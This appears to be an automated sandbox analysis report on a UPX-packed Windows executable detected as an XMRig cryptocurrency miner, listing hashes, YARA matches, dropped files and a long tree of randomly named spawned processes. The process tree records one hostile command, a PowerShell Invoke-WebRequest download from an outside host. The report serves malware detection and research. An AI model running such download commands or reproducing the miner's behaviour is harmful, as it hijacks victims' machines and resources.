xmrig | 8919f604ba705b6ac1f1021e33da27b0cc738541a27fc7a493f0b4c7f282c47d

Analysis

max time kernel
144s
max time network
148s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
26/04/2024, 10:37

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

009352c0d88dcff33a5dfe472e1efe02_JaffaCakes118.exe
Size

1.9MB
MD5

009352c0d88dcff33a5dfe472e1efe02
SHA1

9c715cfb48f5fec7ce5f40ae0bdfeff36988ab1c
SHA256

8919f604ba705b6ac1f1021e33da27b0cc738541a27fc7a493f0b4c7f282c47d
SHA512

99c9eadd88b3e8e3d6eb4b010dcb11114873e530e35054eba5ec0c14b38f4d2e2644a87f103eb9d2eab384c047b16c9e52aa913da2c127d55b0d4cba94647720
SSDEEP

49152:Lz071uv4BPMkibTIA5KIP7nTrmBhihM5xC+U1x:NABU

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 5 IoCs

miner

resource	yara_rule
behavioral1/memory/2584-117-0x000000013F280000-0x000000013F672000-memory.dmp	xmrig
behavioral1/memory/2840-845-0x000000013F730000-0x000000013FB22000-memory.dmp	xmrig
behavioral1/memory/2968-1009-0x000000013F220000-0x000000013F612000-memory.dmp	xmrig
behavioral1/memory/2720-1006-0x000000013F440000-0x000000013F832000-memory.dmp	xmrig
behavioral1/memory/964-1503-0x000000013FCC0000-0x00000001400B2000-memory.dmp	xmrig

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1136-0-0x000000013F390000-0x000000013F782000-memory.dmp	upx
behavioral1/files/0x000900000001222c-3.dat	upx
behavioral1/files/0x000700000001560a-24.dat	upx
behavioral1/files/0x0009000000015a2d-23.dat	upx
behavioral1/files/0x0008000000015a98-27.dat	upx
behavioral1/files/0x000600000001604b-80.dat	upx
behavioral1/files/0x0006000000016283-77.dat	upx
behavioral1/memory/2584-117-0x000000013F280000-0x000000013F672000-memory.dmp	upx
behavioral1/files/0x0006000000016ccf-175.dat	upx
behavioral1/files/0x0006000000016cf0-177.dat	upx
behavioral1/memory/2840-845-0x000000013F730000-0x000000013FB22000-memory.dmp	upx
behavioral1/memory/2968-1009-0x000000013F220000-0x000000013F612000-memory.dmp	upx
behavioral1/memory/2720-1006-0x000000013F440000-0x000000013F832000-memory.dmp	upx
behavioral1/memory/964-1503-0x000000013FCC0000-0x00000001400B2000-memory.dmp	upx

C:\Users\Admin\AppData\Local\Temp\009352c0d88dcff33a5dfe472e1efe02_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\009352c0d88dcff33a5dfe472e1efe02_JaffaCakes118.exe"
1⤵
PID:1136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  PID:2268
- C:\Windows\System\NuQShPv.exe
  C:\Windows\System\NuQShPv.exe
  2⤵
  PID:2116
- C:\Windows\System\MUfnaxA.exe
  C:\Windows\System\MUfnaxA.exe
  2⤵
  PID:2572
- C:\Windows\System\cwOxQMH.exe
  C:\Windows\System\cwOxQMH.exe
  2⤵
  PID:1672
- C:\Windows\System\ANfKReR.exe
  C:\Windows\System\ANfKReR.exe
  2⤵
  PID:1296
- C:\Windows\System\PtLGNuK.exe
  C:\Windows\System\PtLGNuK.exe
  2⤵
  PID:1508
- C:\Windows\System\TolkZEt.exe
  C:\Windows\System\TolkZEt.exe
  2⤵
  PID:2432
- C:\Windows\System\isprBjs.exe
  C:\Windows\System\isprBjs.exe
  2⤵
  PID:1736
- C:\Windows\System\bgGaKEq.exe
  C:\Windows\System\bgGaKEq.exe
  2⤵
  PID:2776
- C:\Windows\System\ZNDxEWY.exe
  C:\Windows\System\ZNDxEWY.exe
  2⤵
  PID:2236
- C:\Windows\System\wRUwaBI.exe
  C:\Windows\System\wRUwaBI.exe
  2⤵
  PID:2476
- C:\Windows\System\aHJWrEr.exe
  C:\Windows\System\aHJWrEr.exe
  2⤵
  PID:856
- C:\Windows\System\dixtTwa.exe
  C:\Windows\System\dixtTwa.exe
  2⤵
  PID:1200
- C:\Windows\System\FrslVwa.exe
  C:\Windows\System\FrslVwa.exe
  2⤵
  PID:612
- C:\Windows\System\JtlYwVg.exe
  C:\Windows\System\JtlYwVg.exe
  2⤵
  PID:2112
- C:\Windows\System\seWqHso.exe
  C:\Windows\System\seWqHso.exe
  2⤵
  PID:2704
- C:\Windows\System\LPNiMTG.exe
  C:\Windows\System\LPNiMTG.exe
  2⤵
  PID:2020
- C:\Windows\System\aSyxPsS.exe
  C:\Windows\System\aSyxPsS.exe
  2⤵
  PID:2388
- C:\Windows\System\trpmhrj.exe
  C:\Windows\System\trpmhrj.exe
  2⤵
  PID:2712
- C:\Windows\System\CfRPzIM.exe
  C:\Windows\System\CfRPzIM.exe
  2⤵
  PID:2220
- C:\Windows\System\xbTVeoj.exe
  C:\Windows\System\xbTVeoj.exe
  2⤵
  PID:3052
- C:\Windows\System\aLvcUbm.exe
  C:\Windows\System\aLvcUbm.exe
  2⤵
  PID:1276
- C:\Windows\System\KOwmgLr.exe
  C:\Windows\System\KOwmgLr.exe
  2⤵
  PID:2136
- C:\Windows\System\MiWujMC.exe
  C:\Windows\System\MiWujMC.exe
  2⤵
  PID:2844
- C:\Windows\System\bjrrIBP.exe
  C:\Windows\System\bjrrIBP.exe
  2⤵
  PID:1884
- C:\Windows\System\DQtcJFI.exe
  C:\Windows\System\DQtcJFI.exe
  2⤵
  PID:1880
- C:\Windows\System\gUfpqPi.exe
  C:\Windows\System\gUfpqPi.exe
  2⤵
  PID:1984
- C:\Windows\System\TTUuljz.exe
  C:\Windows\System\TTUuljz.exe
  2⤵
  PID:1496
- C:\Windows\System\ePgqmZv.exe
  C:\Windows\System\ePgqmZv.exe
  2⤵
  PID:1040
- C:\Windows\System\gcnotFm.exe
  C:\Windows\System\gcnotFm.exe
  2⤵
  PID:1928
- C:\Windows\System\qGXMNfR.exe
  C:\Windows\System\qGXMNfR.exe
  2⤵
  PID:2760
- C:\Windows\System\jqiVNLd.exe
  C:\Windows\System\jqiVNLd.exe
  2⤵
  PID:1444
- C:\Windows\System\GRqkPGN.exe
  C:\Windows\System\GRqkPGN.exe
  2⤵
  PID:2780
- C:\Windows\System\BcEYOym.exe
  C:\Windows\System\BcEYOym.exe
  2⤵
  PID:2408
- C:\Windows\System\WydjOsr.exe
  C:\Windows\System\WydjOsr.exe
  2⤵
  PID:3008
- C:\Windows\System\fxppHHG.exe
  C:\Windows\System\fxppHHG.exe
  2⤵
  PID:1708
- C:\Windows\System\oftwNWo.exe
  C:\Windows\System\oftwNWo.exe
  2⤵
  PID:2716
- C:\Windows\System\QyEtWxo.exe
  C:\Windows\System\QyEtWxo.exe
  2⤵
  PID:2544
- C:\Windows\System\qJBFyQw.exe
  C:\Windows\System\qJBFyQw.exe
  2⤵
  PID:3088
- C:\Windows\System\tGyWFZa.exe
  C:\Windows\System\tGyWFZa.exe
  2⤵
  PID:3104
- C:\Windows\System\COXsSGx.exe
  C:\Windows\System\COXsSGx.exe
  2⤵
  PID:3120
- C:\Windows\System\JxWIzzU.exe
  C:\Windows\System\JxWIzzU.exe
  2⤵
  PID:3136
- C:\Windows\System\aPXOOjp.exe
  C:\Windows\System\aPXOOjp.exe
  2⤵
  PID:3152
- C:\Windows\System\GdMkuHe.exe
  C:\Windows\System\GdMkuHe.exe
  2⤵
  PID:3168
- C:\Windows\System\MzWjslg.exe
  C:\Windows\System\MzWjslg.exe
  2⤵
  PID:3184
- C:\Windows\System\FRqgmOZ.exe
  C:\Windows\System\FRqgmOZ.exe
  2⤵
  PID:3276
- C:\Windows\System\IbbLqNJ.exe
  C:\Windows\System\IbbLqNJ.exe
  2⤵
  PID:3292
- C:\Windows\System\brqdoYN.exe
  C:\Windows\System\brqdoYN.exe
  2⤵
  PID:3308
- C:\Windows\System\MZOBWky.exe
  C:\Windows\System\MZOBWky.exe
  2⤵
  PID:3324
- C:\Windows\System\pEBRyqE.exe
  C:\Windows\System\pEBRyqE.exe
  2⤵
  PID:3340
- C:\Windows\System\fjEXEsK.exe
  C:\Windows\System\fjEXEsK.exe
  2⤵
  PID:3356
- C:\Windows\System\sHBBKWI.exe
  C:\Windows\System\sHBBKWI.exe
  2⤵
  PID:3372
- C:\Windows\System\oMuVgre.exe
  C:\Windows\System\oMuVgre.exe
  2⤵
  PID:3388
- C:\Windows\System\OPfhGXm.exe
  C:\Windows\System\OPfhGXm.exe
  2⤵
  PID:3404
- C:\Windows\System\FFghmmE.exe
  C:\Windows\System\FFghmmE.exe
  2⤵
  PID:3420
- C:\Windows\System\nAWnaSw.exe
  C:\Windows\System\nAWnaSw.exe
  2⤵
  PID:3436
- C:\Windows\System\nRkNJwi.exe
  C:\Windows\System\nRkNJwi.exe
  2⤵
  PID:3452
- C:\Windows\System\qVgplnc.exe
  C:\Windows\System\qVgplnc.exe
  2⤵
  PID:3472
- C:\Windows\System\SQphcAv.exe
  C:\Windows\System\SQphcAv.exe
  2⤵
  PID:3548
- C:\Windows\System\ICXgLUU.exe
  C:\Windows\System\ICXgLUU.exe
  2⤵
  PID:3564
- C:\Windows\System\QJzWzrc.exe
  C:\Windows\System\QJzWzrc.exe
  2⤵
  PID:3580
- C:\Windows\System\rprbhaz.exe
  C:\Windows\System\rprbhaz.exe
  2⤵
  PID:3596
- C:\Windows\System\mbzziOA.exe
  C:\Windows\System\mbzziOA.exe
  2⤵
  PID:3612
- C:\Windows\System\vItUjcP.exe
  C:\Windows\System\vItUjcP.exe
  2⤵
  PID:3640
- C:\Windows\System\WIvyUOj.exe
  C:\Windows\System\WIvyUOj.exe
  2⤵
  PID:3656
- C:\Windows\System\JtvoULn.exe
  C:\Windows\System\JtvoULn.exe
  2⤵
  PID:3672
- C:\Windows\System\lNXSkCn.exe
  C:\Windows\System\lNXSkCn.exe
  2⤵
  PID:3716
- C:\Windows\System\siqvhjP.exe
  C:\Windows\System\siqvhjP.exe
  2⤵
  PID:3732
- C:\Windows\System\OBkHraT.exe
  C:\Windows\System\OBkHraT.exe
  2⤵
  PID:3748
- C:\Windows\System\cfVvTWR.exe
  C:\Windows\System\cfVvTWR.exe
  2⤵
  PID:3764
- C:\Windows\System\fDyNxCN.exe
  C:\Windows\System\fDyNxCN.exe
  2⤵
  PID:3780
- C:\Windows\System\lCsEfce.exe
  C:\Windows\System\lCsEfce.exe
  2⤵
  PID:3796
- C:\Windows\System\CmAFhzb.exe
  C:\Windows\System\CmAFhzb.exe
  2⤵
  PID:3812
- C:\Windows\System\mWpImar.exe
  C:\Windows\System\mWpImar.exe
  2⤵
  PID:3828
- C:\Windows\System\IuiEdbK.exe
  C:\Windows\System\IuiEdbK.exe
  2⤵
  PID:3844
- C:\Windows\System\gzGbCHx.exe
  C:\Windows\System\gzGbCHx.exe
  2⤵
  PID:3860
- C:\Windows\System\difVbIS.exe
  C:\Windows\System\difVbIS.exe
  2⤵
  PID:3880
- C:\Windows\System\KaZDGEo.exe
  C:\Windows\System\KaZDGEo.exe
  2⤵
  PID:3896
- C:\Windows\System\DnQWDHY.exe
  C:\Windows\System\DnQWDHY.exe
  2⤵
  PID:3952
- C:\Windows\System\pBMwiaZ.exe
  C:\Windows\System\pBMwiaZ.exe
  2⤵
  PID:3968
- C:\Windows\System\MlLvQkL.exe
  C:\Windows\System\MlLvQkL.exe
  2⤵
  PID:3984
- C:\Windows\System\DyzcaVE.exe
  C:\Windows\System\DyzcaVE.exe
  2⤵
  PID:4000
- C:\Windows\System\KRdVXal.exe
  C:\Windows\System\KRdVXal.exe
  2⤵
  PID:4016
- C:\Windows\System\CPhgauT.exe
  C:\Windows\System\CPhgauT.exe
  2⤵
  PID:4032
- C:\Windows\System\XqBapHL.exe
  C:\Windows\System\XqBapHL.exe
  2⤵
  PID:4048
- C:\Windows\System\XUkfwQr.exe
  C:\Windows\System\XUkfwQr.exe
  2⤵
  PID:4064
- C:\Windows\System\tsvHxlq.exe
  C:\Windows\System\tsvHxlq.exe
  2⤵
  PID:4084
- C:\Windows\System\WvGcoUd.exe
  C:\Windows\System\WvGcoUd.exe
  2⤵
  PID:2296
- C:\Windows\System\uSlrCXn.exe
  C:\Windows\System\uSlrCXn.exe
  2⤵
  PID:2828
- C:\Windows\System\bISitut.exe
  C:\Windows\System\bISitut.exe
  2⤵
  PID:2452
- C:\Windows\System\RzaKeTC.exe
  C:\Windows\System\RzaKeTC.exe
  2⤵
  PID:1440
- C:\Windows\System\VNWMvrD.exe
  C:\Windows\System\VNWMvrD.exe
  2⤵
  PID:1560
- C:\Windows\System\EsxZiJe.exe
  C:\Windows\System\EsxZiJe.exe
  2⤵
  PID:1580
- C:\Windows\System\OakGcHG.exe
  C:\Windows\System\OakGcHG.exe
  2⤵
  PID:2640
- C:\Windows\System\diyzojV.exe
  C:\Windows\System\diyzojV.exe
  2⤵
  PID:1724
- C:\Windows\System\wsctyQZ.exe
  C:\Windows\System\wsctyQZ.exe
  2⤵
  PID:1840
- C:\Windows\System\VKzPzlW.exe
  C:\Windows\System\VKzPzlW.exe
  2⤵
  PID:2216
- C:\Windows\System\jXTxJzc.exe
  C:\Windows\System\jXTxJzc.exe
  2⤵
  PID:1952
- C:\Windows\System\kqgXYgZ.exe
  C:\Windows\System\kqgXYgZ.exe
  2⤵
  PID:3128
- C:\Windows\System\CrqjkoQ.exe
  C:\Windows\System\CrqjkoQ.exe
  2⤵
  PID:3192
- C:\Windows\System\FLVleVm.exe
  C:\Windows\System\FLVleVm.exe
  2⤵
  PID:3232
- C:\Windows\System\QrtDhfL.exe
  C:\Windows\System\QrtDhfL.exe
  2⤵
  PID:3252
- C:\Windows\System\NsMeqnS.exe
  C:\Windows\System\NsMeqnS.exe
  2⤵
  PID:1680
- C:\Windows\System\whttSzW.exe
  C:\Windows\System\whttSzW.exe
  2⤵
  PID:2232
- C:\Windows\System\EYoyhLW.exe
  C:\Windows\System\EYoyhLW.exe
  2⤵
  PID:1700
- C:\Windows\System\zPAkunY.exe
  C:\Windows\System\zPAkunY.exe
  2⤵
  PID:544
- C:\Windows\System\WJpqnLu.exe
  C:\Windows\System\WJpqnLu.exe
  2⤵
  PID:3464
- C:\Windows\System\FiIdXHq.exe
  C:\Windows\System\FiIdXHq.exe
  2⤵
  PID:3144
- C:\Windows\System\nbhINZE.exe
  C:\Windows\System\nbhINZE.exe
  2⤵
  PID:3320
- C:\Windows\System\uWXsXID.exe
  C:\Windows\System\uWXsXID.exe
  2⤵
  PID:3444
- C:\Windows\System\cKzrsNM.exe
  C:\Windows\System\cKzrsNM.exe
  2⤵
  PID:2932
- C:\Windows\System\rEnrvxT.exe
  C:\Windows\System\rEnrvxT.exe
  2⤵
  PID:2884
- C:\Windows\System\RNClGuZ.exe
  C:\Windows\System\RNClGuZ.exe
  2⤵
  PID:3148
- C:\Windows\System\PAQrnMl.exe
  C:\Windows\System\PAQrnMl.exe
  2⤵
  PID:3288
- C:\Windows\System\prjyZNf.exe
  C:\Windows\System\prjyZNf.exe
  2⤵
  PID:3416
- C:\Windows\System\PlZjQPU.exe
  C:\Windows\System\PlZjQPU.exe
  2⤵
  PID:3680
- C:\Windows\System\CWLYclv.exe
  C:\Windows\System\CWLYclv.exe
  2⤵
  PID:3588
- C:\Windows\System\MynkVzO.exe
  C:\Windows\System\MynkVzO.exe
  2⤵
  PID:3508
- C:\Windows\System\psxBapq.exe
  C:\Windows\System\psxBapq.exe
  2⤵
  PID:3740
- C:\Windows\System\uPkgNFT.exe
  C:\Windows\System\uPkgNFT.exe
  2⤵
  PID:3804
- C:\Windows\System\jfPGrcm.exe
  C:\Windows\System\jfPGrcm.exe
  2⤵
  PID:3932
- C:\Windows\System\issRwJd.exe
  C:\Windows\System\issRwJd.exe
  2⤵
  PID:3096
- C:\Windows\System\efDSJlD.exe
  C:\Windows\System\efDSJlD.exe
  2⤵
  PID:3980
- C:\Windows\System\ejeeoTK.exe
  C:\Windows\System\ejeeoTK.exe
  2⤵
  PID:4924
- C:\Windows\System\rjEEkBc.exe
  C:\Windows\System\rjEEkBc.exe
  2⤵
  PID:3212
- C:\Windows\System\WStMwer.exe
  C:\Windows\System\WStMwer.exe
  2⤵
  PID:4108
- C:\Windows\System\LmcVFvL.exe
  C:\Windows\System\LmcVFvL.exe
  2⤵
  PID:912
- C:\Windows\System\qGGywhu.exe
  C:\Windows\System\qGGywhu.exe
  2⤵
  PID:3160
- C:\Windows\System\jKsHkze.exe
  C:\Windows\System\jKsHkze.exe
  2⤵
  PID:3684
- C:\Windows\System\LnLMgQo.exe
  C:\Windows\System\LnLMgQo.exe
  2⤵
  PID:3976
- C:\Windows\System\qGCJuLj.exe
  C:\Windows\System\qGCJuLj.exe
  2⤵
  PID:1828
- C:\Windows\System\bUCtPzV.exe
  C:\Windows\System\bUCtPzV.exe
  2⤵
  PID:4220
- C:\Windows\System\iYrBJXV.exe
  C:\Windows\System\iYrBJXV.exe
  2⤵
  PID:4292
- C:\Windows\System\xQebPuR.exe
  C:\Windows\System\xQebPuR.exe
  2⤵
  PID:3368
- C:\Windows\System\LoFEDbg.exe
  C:\Windows\System\LoFEDbg.exe
  2⤵
  PID:3776
- C:\Windows\System\fsxfyCG.exe
  C:\Windows\System\fsxfyCG.exe
  2⤵
  PID:2156
- C:\Windows\System\sorwLMH.exe
  C:\Windows\System\sorwLMH.exe
  2⤵
  PID:4180
- C:\Windows\System\yRZHPJr.exe
  C:\Windows\System\yRZHPJr.exe
  2⤵
  PID:4208
- C:\Windows\System\DUoNgAT.exe
  C:\Windows\System\DUoNgAT.exe
  2⤵
  PID:4104
- C:\Windows\System\UdescSX.exe
  C:\Windows\System\UdescSX.exe
  2⤵
  PID:380
- C:\Windows\System\WKNNYLR.exe
  C:\Windows\System\WKNNYLR.exe
  2⤵
  PID:4168
- C:\Windows\System\BPJBWMi.exe
  C:\Windows\System\BPJBWMi.exe
  2⤵
  PID:5508
- C:\Windows\System\cigtVBb.exe
  C:\Windows\System\cigtVBb.exe
  2⤵
  PID:2068
- C:\Windows\System\XoeyzAW.exe
  C:\Windows\System\XoeyzAW.exe
  2⤵
  PID:5244
- C:\Windows\System\sbgsGjH.exe
  C:\Windows\System\sbgsGjH.exe
  2⤵
  PID:5312
- C:\Windows\System\wOGrywd.exe
  C:\Windows\System\wOGrywd.exe
  2⤵
  PID:5356
- C:\Windows\System\eljGeiM.exe
  C:\Windows\System\eljGeiM.exe
  2⤵
  PID:5452
- C:\Windows\System\prQXWtP.exe
  C:\Windows\System\prQXWtP.exe
  2⤵
  PID:5712
- C:\Windows\System\mnXqFwr.exe
  C:\Windows\System\mnXqFwr.exe
  2⤵
  PID:5804
- C:\Windows\System\VAeObxN.exe
  C:\Windows\System\VAeObxN.exe
  2⤵
  PID:5868
- C:\Windows\System\somHRyp.exe
  C:\Windows\System\somHRyp.exe
  2⤵
  PID:5932
- C:\Windows\System\LmdynZw.exe
  C:\Windows\System\LmdynZw.exe
  2⤵
  PID:3336
- C:\Windows\System\PAdfJYc.exe
  C:\Windows\System\PAdfJYc.exe
  2⤵
  PID:4660
- C:\Windows\System\jjMREGv.exe
  C:\Windows\System\jjMREGv.exe
  2⤵
  PID:3792
- C:\Windows\System\toNmmjn.exe
  C:\Windows\System\toNmmjn.exe
  2⤵
  PID:5168
- C:\Windows\System\BeRpElW.exe
  C:\Windows\System\BeRpElW.exe
  2⤵
  PID:5224
- C:\Windows\System\EjxJPdJ.exe
  C:\Windows\System\EjxJPdJ.exe
  2⤵
  PID:5252
- C:\Windows\System\ivPYZwp.exe
  C:\Windows\System\ivPYZwp.exe
  2⤵
  PID:5292
- C:\Windows\System\bnLhmIN.exe
  C:\Windows\System\bnLhmIN.exe
  2⤵
  PID:5324
- C:\Windows\System\BvtCeNf.exe
  C:\Windows\System\BvtCeNf.exe
  2⤵
  PID:5588
- C:\Windows\System\HcUnVXW.exe
  C:\Windows\System\HcUnVXW.exe
  2⤵
  PID:5684
- C:\Windows\System\XcWxEWn.exe
  C:\Windows\System\XcWxEWn.exe
  2⤵
  PID:5912
- C:\Windows\System\dbKobcY.exe
  C:\Windows\System\dbKobcY.exe
  2⤵
  PID:1524
- C:\Windows\System\SmyPhpr.exe
  C:\Windows\System\SmyPhpr.exe
  2⤵
  PID:6052
- C:\Windows\System\QRLDeCU.exe
  C:\Windows\System\QRLDeCU.exe
  2⤵
  PID:6116
- C:\Windows\System\LZSskel.exe
  C:\Windows\System\LZSskel.exe
  2⤵
  PID:3380
- C:\Windows\System\WSeILzD.exe
  C:\Windows\System\WSeILzD.exe
  2⤵
  PID:5344
- C:\Windows\System\BXiPASZ.exe
  C:\Windows\System\BXiPASZ.exe
  2⤵
  PID:4520
- C:\Windows\System\MSprcSo.exe
  C:\Windows\System\MSprcSo.exe
  2⤵
  PID:4128
- C:\Windows\System\mKclkOj.exe
  C:\Windows\System\mKclkOj.exe
  2⤵
  PID:5540
- C:\Windows\System\eyErVft.exe
  C:\Windows\System\eyErVft.exe
  2⤵
  PID:5816
- C:\Windows\System\FyFEBMp.exe
  C:\Windows\System\FyFEBMp.exe
  2⤵
  PID:5884
- C:\Windows\System\pwxULyl.exe
  C:\Windows\System\pwxULyl.exe
  2⤵
  PID:5056
- C:\Windows\System\FzrrUDm.exe
  C:\Windows\System\FzrrUDm.exe
  2⤵
  PID:6000
- C:\Windows\System\nVvwYuG.exe
  C:\Windows\System\nVvwYuG.exe
  2⤵
  PID:2808
- C:\Windows\System\PatqUuR.exe
  C:\Windows\System\PatqUuR.exe
  2⤵
  PID:4956
- C:\Windows\System\swJzIBg.exe
  C:\Windows\System\swJzIBg.exe
  2⤵
  PID:1308
- C:\Windows\System\pvAMAxo.exe
  C:\Windows\System\pvAMAxo.exe
  2⤵
  PID:5132
- C:\Windows\System\MscdqYW.exe
  C:\Windows\System\MscdqYW.exe
  2⤵
  PID:6068
- C:\Windows\System\jckFTKh.exe
  C:\Windows\System\jckFTKh.exe
  2⤵
  PID:5572
- C:\Windows\System\WyTxePl.exe
  C:\Windows\System\WyTxePl.exe
  2⤵
  PID:4308
- C:\Windows\System\mLHwRhh.exe
  C:\Windows\System\mLHwRhh.exe
  2⤵
  PID:5232
- C:\Windows\System\YdJtoJz.exe
  C:\Windows\System\YdJtoJz.exe
  2⤵
  PID:5648
- C:\Windows\System\SoGGYPz.exe
  C:\Windows\System\SoGGYPz.exe
  2⤵
  PID:5964
- C:\Windows\System\RoOnrxZ.exe
  C:\Windows\System\RoOnrxZ.exe
  2⤵
  PID:1064
- C:\Windows\System\VzbIQcA.exe
  C:\Windows\System\VzbIQcA.exe
  2⤵
  PID:2596
- C:\Windows\System\bbIuLuV.exe
  C:\Windows\System\bbIuLuV.exe
  2⤵
  PID:5632
- C:\Windows\System\lKYgGCS.exe
  C:\Windows\System\lKYgGCS.exe
  2⤵
  PID:1832
- C:\Windows\System\gTzXgwi.exe
  C:\Windows\System\gTzXgwi.exe
  2⤵
  PID:4636
- C:\Windows\System\CMCzdCX.exe
  C:\Windows\System\CMCzdCX.exe
  2⤵
  PID:5200
- C:\Windows\System\dXJFDqY.exe
  C:\Windows\System\dXJFDqY.exe
  2⤵
  PID:5584
- C:\Windows\System\nQbCnnh.exe
  C:\Windows\System\nQbCnnh.exe
  2⤵
  PID:5604
- C:\Windows\System\mYLdsFh.exe
  C:\Windows\System\mYLdsFh.exe
  2⤵
  PID:5124
- C:\Windows\System\NBTMbLH.exe
  C:\Windows\System\NBTMbLH.exe
  2⤵
  PID:5748
- C:\Windows\System\wlCETIQ.exe
  C:\Windows\System\wlCETIQ.exe
  2⤵
  PID:6132
- C:\Windows\System\SocOXke.exe
  C:\Windows\System\SocOXke.exe
  2⤵
  PID:5756
- C:\Windows\System\AuNMgho.exe
  C:\Windows\System\AuNMgho.exe
  2⤵
  PID:6180
- C:\Windows\System\wIyAaMw.exe
  C:\Windows\System\wIyAaMw.exe
  2⤵
  PID:6568
- C:\Windows\System\xNGnqfU.exe
  C:\Windows\System\xNGnqfU.exe
  2⤵
  PID:6732

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\system\ADEJwLE.exe

Filesize
1.9MB

MD5
85bdc25a281068d193ffeb53930e4f54

SHA1
5a1a0eb318feae751007f1df835a0b4ae5a48eb4

SHA256
83d811d8dac4d6a783ec5d2dcde4724d857db8e2dcb52302c5323057c75c0fc4

SHA512
af60e700d021e302467a81adaa0bdc9ba2e0a6eec142c3f1889558a4e72b407efe670c012935c225b95d9d53485b99426ef38542788fe078479d00ba4481a456

Download Submit
C:\Windows\system\SGLbENq.exe

Filesize
1.9MB

MD5
a4f2a5f69a6731bd0f5d5de259529a0e

SHA1
fc642cbd0b70e5d7f6fa8ed176093946c393969b

SHA256
4476551d0190b2fc721588c51fb8f122a9556faab5330099715f9a8315a994ee

SHA512
63e2ddee51aaf32a50d8bda916122b9c5f18a9175848f95de22ff4bbcf11d6fcaf471f51e85933725569c74da6d2ac4f6ba949757974bfb260d98565a404da9c

Download Submit
C:\Windows\system\YzYbFJV.exe

Filesize
1.9MB

MD5
8f410bb5493f2451176db9a394f037bf

SHA1
1ae126e839b819d708d1a679e0ca81dadb64cb86

SHA256
f5f30f307d2e990ad7d0345baeadac7375d13da81a7480c521f91f8a72ed5132

SHA512
916a32cc0a554bcd2a214ad063bf539ae04e1cb1fc3d938c52f3390ed99e7e675e0cf830d0a6f7e6b6fa996081350e7e37d28056ea32201ee7a0fbbd3c81714b

Download Submit
C:\Windows\system\czxgHnz.exe

Filesize
1.9MB

MD5
153345a604fcbb9bd912bba7143f40c8

SHA1
39203f7fbaa3ddd363221aef298ec10c348376bd

SHA256
12453df14895c2d665423e997d9e88accd36ecb83133643b2fc7a99f6099c377

SHA512
78fa5fdd1ee0172641a624622a9a28f7aa473539bdc3154c2f66aa1974a871de9b90ff6db9e7772ffa8cf655d91e3dc4f8c6418bb1f8772ab42fac2fe9991e8d

Download Submit
\Windows\system\NuQShPv.exe

Filesize
1.9MB

MD5
834217c7691fa083a9c9d2a9c28c601f

SHA1
f4f72de142c6b99efc2712ad7fb8c011e6e6cf29

SHA256
b9947c73c0d95e0e45b2fb7a6d8d599c1ec9b52e1258528303714869de10ff86

SHA512
1fa0abbbbcf6e9573bfd2923a5ac47902867a464350c513b9aef696845f0f4995799e708673e813f36fc511cc93f86571aa6705e1f9c05c7b201113e39f755cd

Download Submit
\Windows\system\SjhoeYw.exe

Filesize
1.9MB

MD5
cbd48d99ccf6385ec4f04e956f1ec2cd

SHA1
6919845a59a4ebab24af3100a57d8da2ba803f5c

SHA256
deaab216a46c5f8660246000d01257c5c5a9d47a546608a6c4d6f6c322fb98a4

SHA512
0153a7b16ac0c93408e2a23b05e00d63cf787cfcaddebcaa12c660bcc6df44a48427ef0a51ab3492e4f28c9dbdbaf3ef88a660102bb35bc8dba2ab53e54a1574

Download Submit
\Windows\system\cwOxQMH.exe

Filesize
1.9MB

MD5
ddd6e416fa4a4c87e9996f441ce713c8

SHA1
0f6fdc0aba2858c45584c3b5b9c922bda8505a7e

SHA256
d763458ec2ea03cea41f27d2b0544e6a33b18305ab81ad9ca7098a219665e4d8

SHA512
1132fe42a0fd823657850a720ee21968f0673bc4c977944f0139abb3d79ce05e422eb83d43d39e31d157e2e02a48a0fb5ce281655d4b4746b92dc30e7ade9b9c

Download Submit
\Windows\system\xioaiFm.exe

Filesize
1.9MB

MD5
449ec50d7878c7680be60514bad4789c

SHA1
f231218c5423eb68b660daac4713654459fbe396

SHA256
fe7ac36c42303c7d6fd68a0d977855322dfda3126658803104ad2275837c8090

SHA512
b24c2c5d9a29a9d9a6ce8f10a53ef8183fdb636e92babe495e6cdd589e00f91fa3a28c604229dc16453320db345f8dfab63875b5a7d7cc820045727ad843a7c9

Download Submit
memory/964-1503-0x000000013FCC0000-0x00000001400B2000-memory.dmp

Filesize
3.9MB

Download
memory/1136-30-0x000000013FC00000-0x000000013FFF2000-memory.dmp

Filesize
3.9MB

Download
memory/1136-0-0x000000013F390000-0x000000013F782000-memory.dmp

Filesize
3.9MB

Download
memory/1136-116-0x0000000003150000-0x0000000003542000-memory.dmp

Filesize
3.9MB

Download
memory/1136-1-0x00000000000F0000-0x0000000000100000-memory.dmp

Filesize
64KB

Download
memory/2584-117-0x000000013F280000-0x000000013F672000-memory.dmp

Filesize
3.9MB

Download
memory/2720-1006-0x000000013F440000-0x000000013F832000-memory.dmp

Filesize
3.9MB

Download
memory/2840-845-0x000000013F730000-0x000000013FB22000-memory.dmp

Filesize
3.9MB

Download
memory/2968-1009-0x000000013F220000-0x000000013F612000-memory.dmp

Filesize
3.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads